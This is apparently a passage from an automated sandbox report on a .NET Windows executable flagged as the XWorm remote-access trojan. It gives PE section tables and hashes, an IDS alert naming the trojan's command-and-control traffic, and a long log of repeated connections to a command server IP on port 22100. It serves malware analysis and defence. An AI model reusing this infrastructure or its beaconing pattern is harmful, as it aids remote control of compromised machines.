                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa5980x53.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4c0.rsrc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                        .text0x20000x85f40x860053d5b560ee49ba4a9b5146ee562601d1False0.4949277052238806data5.713623102639735IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .rsrc0xc0000x4c00x600d24be674e9be309c1a25a815f2f738efFalse0.3717447916666667data3.6796695422943375IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        .reloc0xe0000xc0x200fd3ac7fbb8a34dc91e775b7c64e87bbcFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                        RT_VERSION0xc0a00x22cdata0.4784172661870504
                                                                                                                                                                                                        RT_MANIFEST0xc2d00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                        mscoree.dll_CorExeMain
                                                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        192.168.2.6167.71.56.11649753221002855924 02/07/24-03:23:12.549811TCP2855924ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound4975322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Feb 7, 2024 03:21:56.954806089 CET49699443192.168.2.6149.154.167.220
                                                                                                                                                                                                        Feb 7, 2024 03:21:56.954878092 CET44349699149.154.167.220192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:56.954938889 CET49699443192.168.2.6149.154.167.220
                                                                                                                                                                                                        Feb 7, 2024 03:21:57.015192986 CET49699443192.168.2.6149.154.167.220
                                                                                                                                                                                                        Feb 7, 2024 03:21:57.015239954 CET44349699149.154.167.220192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:57.655833960 CET44349699149.154.167.220192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:57.655901909 CET49699443192.168.2.6149.154.167.220
                                                                                                                                                                                                        Feb 7, 2024 03:21:57.662532091 CET49699443192.168.2.6149.154.167.220
                                                                                                                                                                                                        Feb 7, 2024 03:21:57.662555933 CET44349699149.154.167.220192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:57.662836075 CET44349699149.154.167.220192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:57.711177111 CET49699443192.168.2.6149.154.167.220
                                                                                                                                                                                                        Feb 7, 2024 03:21:57.749631882 CET49699443192.168.2.6149.154.167.220
                                                                                                                                                                                                        Feb 7, 2024 03:21:57.789906979 CET44349699149.154.167.220192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.090409994 CET44349699149.154.167.220192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.090579987 CET44349699149.154.167.220192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.090641022 CET49699443192.168.2.6149.154.167.220
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.104196072 CET49699443192.168.2.6149.154.167.220
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.519660950 CET4970022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.735848904 CET2210049700167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.735943079 CET4970022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.789386988 CET4970022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.951795101 CET2210049700167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:58.951940060 CET4970022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:21:59.004719973 CET2210049700167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:21:59.167407036 CET2210049700167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.562031984 CET4970122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.773753881 CET2210049701167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.773946047 CET4970122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.796124935 CET4970122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.985428095 CET2210049701167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:03.985541105 CET4970122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:04.007489920 CET2210049701167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:04.196619034 CET2210049701167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.533687115 CET4970222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.737611055 CET2210049702167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.737912893 CET4970222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.831494093 CET4970222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.941660881 CET2210049702167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:07.941864014 CET4970222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:08.035135984 CET2210049702167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:08.145365000 CET2210049702167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:10.996207952 CET4970622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.205595970 CET2210049706167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.205720901 CET4970622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.262212038 CET4970622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.415347099 CET2210049706167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.415561914 CET4970622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.471285105 CET2210049706167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.476917982 CET4970622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.480190039 CET4971022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.624701977 CET2210049706167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.685995102 CET2210049706167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.689821959 CET2210049710167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.689923048 CET4971022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.709780931 CET4971022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.899496078 CET2210049710167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.899796009 CET4971022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.919131041 CET2210049710167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.930179119 CET4971022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:11.937658072 CET4971222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.109224081 CET2210049710167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.139367104 CET2210049710167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.148842096 CET2210049712167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.149009943 CET4971222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.169909000 CET4971222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.360110998 CET2210049712167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.360415936 CET4971222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.381639004 CET2210049712167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:12.571192026 CET2210049712167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:16.901619911 CET4971322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.105403900 CET2210049713167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.105532885 CET4971322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.125406981 CET4971322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.309138060 CET2210049713167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.312493086 CET4971322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.328871012 CET2210049713167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.336462021 CET4971322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.338047028 CET4971422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.515980005 CET2210049713167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.539654016 CET2210049713167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.554600954 CET2210049714167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.554754019 CET4971422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.574696064 CET4971422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.771348000 CET2210049714167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.771460056 CET4971422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.789454937 CET4971422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.791205883 CET4971522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.791543961 CET2210049714167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.987646103 CET2210049714167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.994600058 CET2210049715167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:17.994668961 CET4971522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.005609989 CET2210049714167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.028922081 CET4971522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.198153019 CET2210049715167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.198214054 CET4971522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.232037067 CET2210049715167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.242608070 CET4971522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.244484901 CET4971622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.401829958 CET2210049715167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.446232080 CET2210049715167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.462418079 CET2210049716167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.462595940 CET4971622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.484559059 CET4971622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.681191921 CET2210049716167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.682574034 CET4971622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.701560974 CET2210049716167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.712162971 CET4971622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.726908922 CET4971722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.899564981 CET2210049716167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.929279089 CET2210049716167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.941895008 CET2210049717167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.941993952 CET4971722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:18.966399908 CET4971722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.156992912 CET2210049717167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.157068968 CET4971722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.180350065 CET4971722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.181176901 CET2210049717167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.183779001 CET4971822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.371941090 CET2210049717167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.395103931 CET2210049718167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.395211935 CET4971822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.395661116 CET2210049717167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.416632891 CET4971822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.606570005 CET2210049718167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.606648922 CET4971822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.627819061 CET2210049718167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:19.817801952 CET2210049718167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.135905981 CET4971922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.345863104 CET2210049719167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.346004009 CET4971922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.379738092 CET4971922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.555588961 CET2210049719167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.555666924 CET4971922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.589289904 CET2210049719167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.602057934 CET4971922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.605385065 CET4972022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.765183926 CET2210049719167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.811697006 CET2210049719167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.816922903 CET2210049720167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:23.817157030 CET4972022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:24.028764963 CET2210049720167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:24.028847933 CET4972022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.107862949 CET4972022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.216125965 CET4972022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.222419024 CET4972122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.319139957 CET2210049720167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.427445889 CET2210049720167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.437774897 CET2210049721167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.437902927 CET4972122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.459331989 CET4972122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.653358936 CET2210049721167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.653438091 CET4972122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.674520969 CET2210049721167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:25.868673086 CET2210049721167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:29.947668076 CET4972222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.154665947 CET2210049722167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.154884100 CET4972222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.179014921 CET4972222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.361340046 CET2210049722167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.361599922 CET4972222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.385521889 CET2210049722167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.398834944 CET4972222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.400022030 CET4972322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.568133116 CET2210049722167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.604011059 CET2210049723167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.604182005 CET4972322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.604973078 CET2210049722167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.621782064 CET4972322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.808759928 CET2210049723167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.808841944 CET4972322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:30.825582981 CET2210049723167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:31.012747049 CET2210049723167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.165859938 CET4972422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.372020960 CET2210049724167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.372128963 CET4972422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.388896942 CET4972422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.578624010 CET2210049724167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.578780890 CET4972422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.594810963 CET2210049724167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.601939917 CET4972422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.603492975 CET4972522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.784329891 CET2210049724167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.808020115 CET2210049724167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.808043003 CET2210049725167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.808362007 CET4972522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:35.823932886 CET4972522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.012959003 CET2210049725167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.013108015 CET4972522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.028186083 CET2210049725167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.039417982 CET4972522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.041275024 CET4972622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.217401981 CET2210049725167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.244163990 CET2210049725167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.246469021 CET2210049726167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.246673107 CET4972622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.267827988 CET4972622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.452056885 CET2210049726167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.452328920 CET4972622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.473129988 CET2210049726167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:36.657573938 CET2210049726167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:40.807693958 CET4972722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:41.011396885 CET2210049727167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:41.011528969 CET4972722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:41.214894056 CET2210049727167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:41.214972019 CET4972722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:42.230560064 CET4972722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:42.434087038 CET2210049727167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:45.150398970 CET4972822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:45.355802059 CET2210049728167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:45.355922937 CET4972822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:45.370769978 CET4972822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:45.561204910 CET2210049728167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:45.561310053 CET4972822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:45.575803995 CET2210049728167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:45.766547918 CET2210049728167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:48.806617975 CET4972922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.011198997 CET2210049729167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.011419058 CET4972922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.033523083 CET4972922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.215583086 CET2210049729167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.215663910 CET4972922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.226958036 CET4972922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.228514910 CET4973022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.237365961 CET2210049729167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.419526100 CET2210049729167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.430749893 CET2210049729167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.439342022 CET2210049730167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.439438105 CET4973022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.454330921 CET4973022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.650506020 CET2210049730167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.650626898 CET4973022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.665049076 CET2210049730167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:49.861577034 CET2210049730167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:51.949533939 CET4973222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:52.155776024 CET2210049732167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:52.156511068 CET4973222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:52.171041965 CET4973222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:52.362606049 CET2210049732167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:52.366843939 CET4973222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:52.377029896 CET2210049732167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:52.572922945 CET2210049732167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:53.854823112 CET4973322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:54.059120893 CET2210049733167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:22:54.059438944 CET4973322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:54.078402042 CET4973322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:22:54.263514042 CET2210049733167.71.56.116192.168.2.6
